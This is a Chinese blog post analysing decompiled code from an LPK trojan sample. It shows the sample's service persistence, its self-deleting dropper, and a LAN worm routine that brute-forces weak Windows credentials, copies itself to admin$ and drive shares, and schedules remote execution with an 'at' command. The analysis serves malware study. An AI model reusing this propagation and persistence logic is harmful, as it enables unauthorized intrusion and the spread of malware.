LPK木马分析-01

最新推荐文章于 2024-04-30 09:19:30 发布
最新推荐文章于 2024-04-30 09:19:30 发布
阅读量437 收藏
点赞数
分类专栏: 恶意代码 恶意代码分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33528164/article/details/89762986
版权

序言

在吾爱破解上面找的一个, 练习用的, 本篇文章分析第一个线程的作用.

WinMain

int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
  struct WSAData WSAData; // [sp+0h] [bp-1A0h]@1
  SERVICE_TABLE_ENTRYA ServiceStartTable; // [sp+190h] [bp-10h]@2
  int v7; // [sp+198h] [bp-8h]@2
  int v8; // [sp+19Ch] [bp-4h]@2

  WSAStartup(MAKEWORD(2,2), &WSAData); // 初始化
  if ( sub_405A52() ) // 从注册表中, 查看是否存在此服务
  {
    v7 = 0;
    v8 = 0;
    ServiceStartTable.lpServiceName = "Ghijkl Nopqrstu Wxy";
    ServiceStartTable.lpServiceProc = (LPSERVICE_MAIN_FUNCTIONA)sub_40561A;
    StartServiceCtrlDispatcherA(&ServiceStartTable);
  }
  else
  {
    sub_405B6E("Ghijkl Nopqrstu Wxy", (int)"Ghijkl Nopqrstu Wxyabcde Ghij", "Ghijklmn Pqrstuvwx Abcdefg Ijklmnop Rst");
  }
  return 0;
}

sub_405B6E

    1. 获取函数地址
v3 = LoadLibraryA("ADVAPI32.dll");
  RegCloseKey = GetProcAddress(v3, "RegCloseKey");
  v4 = LoadLibraryA("ADVAPI32.dll");
  OpenSCManagerA = GetProcAddress(v4, "OpenSCManagerA");
  v5 = LoadLibraryA("ADVAPI32.dll");
  OpenServiceA = GetProcAddress(v5, "OpenServiceA");
  v6 = LoadLibraryA("ADVAPI32.dll");
  CloseServiceHandle = GetProcAddress(v6, "CloseServiceHandle");
  v7 = LoadLibraryA("KERNEL32.dll");
  CopyFileA = GetProcAddress(v7, "CopyFileA");
  v8 = LoadLibraryA("ADVAPI32.dll");
  RegSetValueExA = GetProcAddress(v8, "RegSetValueExA");
  v9 = LoadLibraryA("ADVAPI32.dll");
  StartServiceA = GetProcAddress(v9, "StartServiceA");
  v10 = LoadLibraryA("ADVAPI32.dll");
  RegOpenKeyA = GetProcAddress(v10, "RegOpenKeyA");
  v11 = LoadLibraryA("ADVAPI32.dll");
  UnlockServiceDatabase = GetProcAddress(v11, "UnlockServiceDatabase");
  v12 = LoadLibraryA("ADVAPI32.dll");
  ChangeServiceConfig2A = GetProcAddress(v12, "ChangeServiceConfig2A");
  v13 = LoadLibraryA("ADVAPI32.dll");
  CreateServiceA = GetProcAddress(v13, "CreateServiceA");
  v14 = LoadLibraryA("ADVAPI32.dll");
  LockServiceDatabase = GetProcAddress(v14, "LockServiceDatabase");
  GetModuleFileNameA(0u, &Filename, 0x104u);
  GetWindowsDirectoryA(&Buffer, 0x104u);
  bufferLength = strlen(&Buffer);
  • 2 . 拷贝正在执行的EXE到系统目录, 一般为C:\Windows\System32
  if ( strncmp(&Buffer, &Filename, bufferLength) )// 拷贝文件到系统目录
  {
    v16 = sub_406C30(0x1Au) + 'a';
    v17 = sub_406C30(0x1Au) + 'a';
    v18 = sub_406C30(0x1Au) + 'a';
    v19 = sub_406C30(0x1Au) + 'a';
    v20 = sub_406C30(0x1Au) + 'a';
    v21 = sub_406C30(0x1Au);
    wsprintfA(&Source, "%c%c%c%c%c%c.exe", v21 + 'a', v20, v19, v18, v17, v16); //生成随机文件名
    strcat(&Buffer, "\\");// 连接
    strcat(&Buffer, &Source); 
    ((void (__stdcall *)(CHAR *, CHAR *, _DWORD))CopyFileA)(&Filename, &Buffer, 0); // 复制
    memset(&Filename, 0, 0x104u);
    strcpy(&Filename, &Buffer);
    dword_409638 = 1;
  }
    1. 创建服务
 v93 = ((int (__stdcall *)(int, char *, int, signed int, signed int, MACRO_SERVICE_BOOT, signed int, CHAR *, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD))CreateServiceA)(
            v22,            // OpenSCManagerA返回的对象
            a1,             // a1 = Ghijkl Nopqrstu Wxy , lpServiceName
            a2,             // a2 = Ghijkl Nopqrstu Wxyabcde Ghij, lpDisplayName
            0xF01FF,
            0x110,      // SERVICE_INTERACTIVE_PROCESS | SERVICE_WIN32_OWN_PROCESS
            SERVICE_AUTO_START,
            1,         // SERVICE_ERROR_NORMAL
            &Filename, // 恶意文件
            0,
            0,
            0,
            0,
            0);
    1. 填充注册表中创建服务Ghijkl Nopqrstu WxyDescriptionFailureAction
 ((void (__stdcall *)(int, signed int, const CHAR **))ChangeServiceConfig2A)(v93, 1, &v85);// v85 = "Ghijklmn Pqrstuvwx Abcdefg Ijklmnop Rst"
       // BOOL ChangeServiceConfig2A(
       //   SC_HANDLE hService,
       //   DWORD     dwInfoLevel, 1 = SERVICE_CONFIG_DESCRIPTION
       //   LPVOID    lpInfo
       // );
 ((void (__stdcall *)(int, signed int, int *))ChangeServiceConfig2A)(v93, 2, &v61);// v61 = 0x15180
      // BOOL ChangeServiceConfig2A(
      //   SC_HANDLE hService,
      //   DWORD     dwInfoLevel, 2 = SERVICE_CONFIG_FAILURE_ACTIONS
      //   LPVOID    lpInfo
      // );
    1. 开启服务, 并删除文件
  GetModuleFileNameA(0, &Filename, 0x104u);
  GetShortPathNameA(&Filename, &Filename, 0x104u);
  GetEnvironmentVariableA("COMSPEC", &Buffer, 0x104u);// buffer pointers command line interpreter
  lstrcatA(&v8, "/c del ");
  lstrcatA(&v8, &Filename);
  lstrcatA(&v8, " > nul");
  pExecInfo.lpVerb = &v18;      // open
  pExecInfo.lpFile = &Buffer;   // C:\Windows\System32\cmd.exe
  pExecInfo.cbSize = 0x3C;
  pExecInfo.hwnd = 0;
  v18 = 'O';
  v19 = 'p';
  v20 = 'e';
  v21 = 'n';
  v22 = 0;
  pExecInfo.lpParameters = &v8; // /c del fileName.exe > nul
  pExecInfo.lpDirectory = 0;
  pExecInfo.nShow = 0;
  pExecInfo.fMask = 0x40;
 if ( ShellExecuteExA(&pExecInfo) )
  {
    SetPriorityClass(pExecInfo.hProcess, 0x40u);
    v1 = GetCurrentProcess();
    SetPriorityClass(v1, 0x100u);
    v2 = GetCurrentThread();
    SetThreadPriority(v2, 15);
    SHChangeNotify(SHCNE_DELETE, SHCNF_PATH, &Filename, 0);// 
    // void SHChangeNotify( , 修改注册表后需要执行一下SHChangeNotify
    //   LONG    wEventId,
    //   LPCVOID dwItem1,
    //   LPCVOID dwItem2
    // );
    result = 1;
  }

第一个线程(0x402DD5)

总体分析: 获取本机IP, 并尝试通过爆破用户名、密码向局域网内其他主机传播.

    1. 观察
 //用户名
 v43 = "administrator";
  v44 = "test";
  v45 = "admin";
  v46 = "guest";
  v47 = "alex";
  v48 = "home";
  v49 = "love";
.......
//密码
  v14 = &dword_409644;
  v15 = "password";
  v16 = "111";
  v17 = "123456";
  v18 = "qwerty";
  v19 = "test";
  v20 = "abc123";
......
    1. 获取本机IP
gethostname(name, 0x80) // 获取本机主机名
gethostbyname(name);    //获取本机IP
sprintf(&Dest, "%d.%d.%d.%d", v66, v67, v68, 0);// sprintf(,,,,,,1) 生成IP地址, 后面分析, 该木马并没有遍历整个局域网去传播, 只向*.*.*.1传播
    1. 遍历用户名和密码
// 死循环
while ( 1 )
          {
            dword_409624 = 0;
            memset(&Dest, 0, 0x80u);
            sprintf(&Dest, "%d.%d.%d.%d", v66, v67, v68, 0);// sprintf(,,,,,,1)
            if ( "administrator" )
            {
              username = (int *)&v43;
              do
              {
                if ( &dword_409644 )
                {
                  password = (LPCSTR *)&v14;
                  do
                  {
                    Sleep(0xC8u);
                    sub_402AD0((int)&Dest, *username, *password);
                    ++password; //遍历密码
                  }
                  while ( *password );
                }
                ++username; //遍历用户名
              }
              while ( *username );
            }
            dword_40961C = 1;
          }

sub_402AD0

 ((void (__stdcall *)(NETRESOURCE *, LPCSTR, int, _DWORD))WNetAddConnection2A)(&v22, password, username, 0); //尝试连接


if ( WNetAddConnection2A ) //感觉这个地方有问题, WNetAddConnection2A与GetProc有关, 而不是连接成功不成功
  { 
    sub_402A92();
    Sleep(0xC8u);
    memset(&Dest, 0, 0x404u);
    sprintf(&Dest, "\\\\%s\\admin$\\g1fd.exe", IPAddr);
    ((void (__stdcall *)(char *, const char *))lstrcpyA)(&v16, "admin$\\");
    v6 = sub_402A92();                          // Full Path fileName
    if ( ((int (__stdcall *)(CHAR *, char *, _DWORD))CopyFileA)(v6, &Dest, 0)
      || (memset(&Dest, 0, 0x404u),
          sprintf(&Dest, "\\\\%s\\C$\\NewArean.exe", IPAddr),
          ((void (__stdcall *)(_DWORD, const char *))lstrcpyA)(&v16, "C:\\g1fd.exe"),
          v7 = sub_402A92(),
          ((int (__stdcall *)(CHAR *, char *, _DWORD))CopyFileA)(v7, &Dest, 0))
      || (memset(&Dest, 0, 0x404u),
          sprintf(&Dest, "\\\\%s\\D$\\g1fd.exe", IPAddr),
          ((void (__stdcall *)(_DWORD, const char *))lstrcpyA)(&v16, "D:\\g1fd.exe"),
          v8 = sub_402A92(),
          ((int (__stdcall *)(_DWORD, _DWORD, _DWORD))CopyFileA)(v8, &Dest, 0))
      || (memset(&Dest, 0, 0x404u),
          sprintf(&Dest, "\\\\%s\\E$\\g1fd.exe", IPAddr),
          ((void (__stdcall *)(_DWORD, const char *))lstrcpyA)(&v16, "E:\\g1fd.exe"),
          v9 = sub_402A92(),
          ((int (__stdcall *)(_DWORD, _DWORD, _DWORD))CopyFileA)(v9, &Dest, 0)) )
    {
      GetLocalTime(&SystemTime);
      memset(&Dest, 0, 0x404u);
      sprintf(&Dest, "at \\\\%s %d:%d %s", IPAddr, SystemTime.wHour, SystemTime.wMinute + 2, &v16);
      WinExec(&Dest, 0); //远程执行
      dword_409624 = 1;
      Sleep(0x7D0u);
    }
    else
    {
      memset(&Dest, 0, 0x404u);
      sprintf(&Dest, "\\\\%s\\F$\\g1fd.exe", IPAddr);
      ((void (__stdcall *)(char *, const char *))lstrcpyA)(&v16, "F:\\g1fd.exe");
      v10 = sub_402A92();
      ((void (__stdcall *)(CHAR *, char *, _DWORD))CopyFileA)(v10, &Dest, 0);
    }
    result = 0;
  }
  else
  {
    result = 1;
  }

相关链接

吾爱破解
总览

qq_33528164
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C++ Windows 窗体程序入门 - 2.消息处理
wind_2067的博客
01-16 773
超简单 + 易上手 的窗体学习 第二章 消息处理
网络安全学习第1篇 - 简单使用ida工具和破解分析
一清道长的个人博客
04-03 4310
实验目的 目的:了解使用ida工具和破解分析(题目如下) 请使用IDA等工具逆向分析Sample_1、Sample_2以及Sample_3这三个exe文件。 说明: 1、IDA Pro下载链接:https://pan.baidu.com/s/1ErHbDG70jD-bg9eW_rEPsA 提取码:91sc 1、IDA查看地址方法:Options->General,在Line prefix...
木马查杀深度剖析》 pdf
08-30
木马查杀深度剖析》
windows程序窗体创建流程模型A--发送自定义消息逻辑上出现Bug
xzm_cn
02-10 493
创建windows窗体的基本框架中,定义一个消息宏,发送自定义消息,代码如下 #include #define CustomMessages WM_USER+10 HWND g_hWnd; long __stdcall WndProc(HWND hWnd,UINT iMessage,UINT wParam,LONG lParam); int __stdcall WinMain( HINST
一例lpk病毒的分析
最新发布
好好学习,天天向上
04-30 994
lpk病毒通过正常程序侧加载的方式运行,通过感染可移动存储介质、压缩包来传播。第一步 正常程序加载运行当前目录下的lpk.dll 第二步 lpk.dll 从资源节中释放并运行exe,向调用者导出系统lpk.dll的api 第三步 exe 感染系统,创建服务,并启动 第四步 注入傀儡进程svchost.exe 第五步 傀儡进程svchost.exe 释放并加载hra33.dll,请求c2,运行命令 第六步 hra33.dll感染系统所有盘符,在exe目录和压缩包中添加lpk.dll
木马核心技术剖析读书笔记之木马实例解析
不急不躁
03-14 2664
模块化的木马系统架构 被控端是整个木马的核心,它包含 Dropper 与常驻模块两部分 Dropper Dropper 是木马在植入过程中执行的组件,只在目标机器上执行一次,然后自行删除。Dropper 首先判断系统环境,如果检测出在沙盒或者虚拟机中运行,则执行错误的功能,或者非木马本身的功能。如果有调试器存在,则放弃执行。如果没有发现异常,则继续获取系统中安装的安全软件类型等信息,...
LPK.DLL--USP10.DLL-DELETE.rar_lpk
09-20
标题 "LPK.DLL--USP10.DLL-DELETE.rar_lpk" 和描述 "Virus Kill USP10.DLL LNK" 提供的信息暗示这可能与恶意软件或病毒有关,特别是涉及到两个Windows系统文件:LPK.DLL和USP10.DLL。这两个DLL(动态链接库)文件在...
3601lpk-病毒分析报告.docx
08-23
3601lpk-病毒分析报告.docx
LPK.DLL--USP10.DLL-DELETE.rar_lpk_lpk.dll_usp10.dll
09-14
标题 "LPK.DLL--USP10.DLL-DELETE.rar_lpk_lpk.dll_usp10.dll" 和描述 "Virus Kill USP10.DLL LPK.DLL" 提到的是与Windows操作系统中两个重要的动态链接库(DLL)文件相关的主题。LPK.DLL 和 USP10.DLL 文件在系统中...
lpk-usp10木马专杀
07-21
标题“lpk-usp10木马专杀”指出,这是一个专门针对名为“USP10.DLL”的恶意软件的清除工具。USP10.DLL木马是一种计算机病毒,通常利用系统漏洞进行传播,对用户的电脑安全构成威胁。这种木马可能会在用户不知情的...
openssh-lpk_openldap.schema
12-25
openssh-lpk_openldap.schema
木马常见植入技术大剖析
12-22
首先介绍了木马的定义,概括了木马的特征——隐蔽性、欺骗性、自启动性和自动恢复性,并简单介绍了木马的结构和功能。随后,从缓冲区溢出、网站挂马、电子邮件、QQ传播等方面介绍了木马的植入技术,重点从通信隐藏、进程隐藏、文件隐藏三个方面介绍了木马的隐藏技术,最后展望了木马技术的发展趋势。
3601病毒分析
datouyu0824的博客
03-20 1333
1.样本概况 1.1 样本信息 病毒名称:3601 所属家族:Zard MD5值:B5752252B34A8AF470DB1830CC48504D SHA1值:AEC38ADD0AAC1BC59BFAAF1E43DBDAB10E13DB18 CRC32:4EDB317F 病毒行为概述: - 文件操作行为: 0. 删除病毒进程文件,使用随机文件名创建新的病毒文件并启动进程 1. 遍历目录生成lpk.dll文件,覆盖原dll文件,同时还创建其他文件 - 系统操作行为: ...
木马核心技术剖析读书笔记之木马免杀
不急不躁
03-16 2255
免杀原理 基于特征码的检测 基于病毒特征码的检测方法,是目前反病毒软件最常用的检测技术。经过长时间的收集与积累,反病毒软件建立了庞大的已知病毒的特征数据库。在对可疑软件进行检测时,会从特征数据库中匹配已有特征。这种方法相对比较准确、快速,而且可以很容易地通过快速分析,结合新的模板,添加新的病毒文件特征。 特征码可以是一个简单的字符串或者代码字节序列,也可以是包含了已知恶意文件各项特点的...
LPK病毒专杀工具C源代码
c_cold1988的博客
05-25 1503
最近分析了一个lpk的病毒,链接  http://bbs.pediy.com/thread-217841.htm 但感觉还不过瘾,于是手痒写了这个C语言版本的专杀工具。 行为不多说了,杀毒思路1.结束服务:Ghijkl Nopqrstu Wxy,删除服务对应的exe文件。 2.删除HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\ Gh
《Windows核心编程》学习笔记(9)– 在win7或者vista系统下提升一个进程的运行权限
xiliang_pan的专栏
05-23 1087
 win7或者vista默认运行程序是在受限制的环境下运行的,以减轻病毒对于系统的破坏。那么我们怎样才能提升一个进程的权限以至让它在 管理员模式下运行。当然CreateProcess函数没有提供这个功能。相反我们需要调用的是ShellExecuteEx函数:  BOOL ShellExecuteEx(LPSHELLEXECUTEINFO pExecInfo);
计算机病毒鬼畜,[原创]彩虹猫病毒的逆向
weixin_32277761的博客
07-15 1262
搞了一个彩虹猫的病毒,运行了一下,还挺好玩的执行效果:第一次警告:%20第二次警告:记事本显示提示信息:大致意思是说你电脑完犊子了,快使用它把,也别杀死进程,不然系统会变的一团糟之后就是一段鬼畜像极了去蹦迪的我最后系统蓝屏,重启后就是彩虹猫的图片初步分析:样本信息:查壳:无壳这里我先使用ProcessMonitor查看一下程序会进行哪些操作注:因为会运行程序,所以提前备份一下进程树:所以可以推测:...
跟我一起玩Win32开发(2):完整的开发流程
热门推荐
老周——“易之道”
01-13 10万+
上一篇中我给各位说了一般人认为C++中较为难的东西——指针。其实对于C++,难点当然不局限在指针这玩意儿上,还有一些有趣的概念,如模板类、虚基类、纯虚函数等,这些都是概念性的东西,几乎每一本C++书上都会介绍,而平时我们除了会接触到纯虚函数外,其他的不多用。纯虚函数,你可以认为与C#中的抽象方法或接口中的方法类似,即只定义,不实现。好处就是多态,发何处理,由派生类来决定。 在开始吹牛之前,我先推
lpk.dll 这个是木马吗?
06-01
lpk.dll 本身不是木马,它是 Windows 操作系统的一个系统文件,主要用于支持多语言界面。然而,一些恶意软件可能会模仿系统文件的名称,将其作为木马的隐藏文件名,以此来逃避杀毒软件的检测和清除。如果您的计算机...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值